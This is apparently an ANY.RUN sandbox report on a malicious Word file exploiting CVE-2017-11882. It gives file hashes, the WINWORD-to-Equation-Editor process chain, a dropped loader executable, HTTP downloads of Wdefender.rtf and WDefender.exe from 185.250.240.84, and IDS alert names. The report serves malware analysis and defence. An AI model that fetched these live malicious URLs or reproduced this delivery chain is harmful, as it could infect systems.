analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

91bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.doc

Full analysis: https://app.any.run/tasks/55e2e51e-a810-42cd-8bfb-2b6f2f619c6e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 01:16:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
exploit
CVE-2017-11882
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

0D5B5992DB119F6F3E4086677C72D8B0

SHA1:

5968BF2F158D75C991B1A8E4CB62CEFF121D48DA

SHA256:

91BF47893F29474AFD3A49D3786B376D378766153409BB3AA75A6B24F6C300E9

SSDEEP:

192:A2TLQUEPyMtWNbv0mqQTnhr5OJQT1QWP55xMbFTB8GoA6aBkWA5mN:DTLiyMtibhLOJQT1QWDx6dVImN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe (PID: 3120)

    • Downloads executable files from the Internet

      • EQNEDT32.EXE (PID: 3608)

    • Downloads executable files from IP

      • EQNEDT32.EXE (PID: 3608)

    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 3608)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3608)

  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2872)

    • Executable content was dropped or overwritten

      • EQNEDT32.EXE (PID: 3608)

    • Executed via COM

      • EQNEDT32.EXE (PID: 3608)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2872)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XMP

Creator: Microsoft

XML

ModifyDate: 2017:09:24 17:27:00Z
CreateDate: 2017:09:24 17:26:00Z
RevisionNumber: 1
LastModifiedBy: Microsoft
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 7
LinksUpToDate: No
Company: SPecialiST RePack
TitlesOfParts: -
HeadingPairs:
  • Название
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 7
Words: 1
Pages: 1
TotalEditTime: 1 minute
Template: dotm.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1422
ZipCompressedSize: 358
ZipCRC: 0x82872409
ZipModifyDate: 2019:09:18 08:54:18
ZipCompression: Deflated
ZipBitFlag: 0x0002
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winword.exe eqnedt32.exe jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2872"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\91bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3608"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3120"C:\Users\admin\AppData\Local\Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exe"C:\Users\admin\AppData\Local\Jbbkyugrf76drv978toiyutrxtiytvyupoidtxruy tytfuyivf.exeEQNEDT32.EXE
User:
admin
Integrity Level:
MEDIUM
Description:
CheaterChat_app
Version:
1.0.0.0
Total events
1 306
Read events
927
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
24
Text files
6
Unknown types
2

Dropped files

PID
Process
Filename
Type
2872WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8D21.tmp.cvr
MD5:
SHA256:
2872WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{3EEF5842-FF54-4DA2-804D-A515DB5B1E56}
MD5:
SHA256:
2872WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{2575BAE7-EBB6-4161-B391-FA2F501D9F7A}
MD5:
SHA256:
2872WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C80342F.rtf
MD5:
SHA256:
2872WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76C4BD15.rtf
MD5:
SHA256:
2872WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:26DCD08942D12843AD248713682EBBC0
SHA256:4161F999607A21DC748F4E475D8315D4DBA57BFF20BBBE749089C73A5FF7683C
2872WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.docpgc
MD5:B94CAB6FFEA885718D0DBB38B857A072
SHA256:6ED798B09C571CF57F979F04B7AC2C203B85A134E0AC856B91FC60D833E35555
2872WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C6CCA38B653CB96CEE4D992EC1160316
SHA256:77F064971B2635212437CD454AD10DE0235CB7328581A6ADBE5D417BDE35AD12
2872WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FB14BAFE-5382-4EC2-A755-ADFA4E1E9E52}.FSDbinary
MD5:86BBA6BBD3A9762FF6B8BD19EF71A0BA
SHA256:D8528EF48BB2B580EC4E006D82B1D1BB0D9F91EB70395EA9AF5B3C396B05B27C
2872WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:95DE89F5381D88C8BA492D6B8304AD89
SHA256:B72C48DDE70E52AB0183511EF34B8EC1DFCE4C7401BDA41BC1EDD457CF2F4AF4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
984
svchost.exe
OPTIONS
200
185.250.240.84:80
http://185.250.240.84/
unknown
malicious
2872
WINWORD.EXE
GET
304
185.250.240.84:80
http://185.250.240.84/files/Wdefender.rtf
unknown
text
4.60 Kb
malicious
2872
WINWORD.EXE
GET
304
185.250.240.84:80
http://185.250.240.84/files/Wdefender.rtf
unknown
text
4.60 Kb
malicious
3608
EQNEDT32.EXE
GET
200
185.250.240.84:80
http://185.250.240.84/files/WDefender.exe
unknown
executable
303 Kb
malicious
2872
WINWORD.EXE
GET
200
185.250.240.84:80
http://185.250.240.84/files/Wdefender.rtf
unknown
text
4.60 Kb
malicious
984
svchost.exe
PROPFIND
405
185.250.240.84:80
http://185.250.240.84/
unknown
html
226 b
malicious
984
svchost.exe
PROPFIND
405
185.250.240.84:80
http://185.250.240.84/
unknown
html
226 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3608
EQNEDT32.EXE
185.250.240.84:80
malicious
2872
WINWORD.EXE
185.250.240.84:80
malicious
984
svchost.exe
185.250.240.84:80
malicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2872
WINWORD.EXE
Potentially Bad Traffic
ET INFO Dotted Quad Host RTF Request
2872
WINWORD.EXE
Potentially Bad Traffic
ET INFO Dotted Quad Host RTF Request
2872
WINWORD.EXE
Potentially Bad Traffic
ET INFO Dotted Quad Host RTF Request
3608
EQNEDT32.EXE
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3608
EQNEDT32.EXE
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3608
EQNEDT32.EXE
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3608
EQNEDT32.EXE
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3608
EQNEDT32.EXE
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
91bf47893f29474afd3a49d3786b376d378766153409bb3aa75a6b24f6c300e9.doc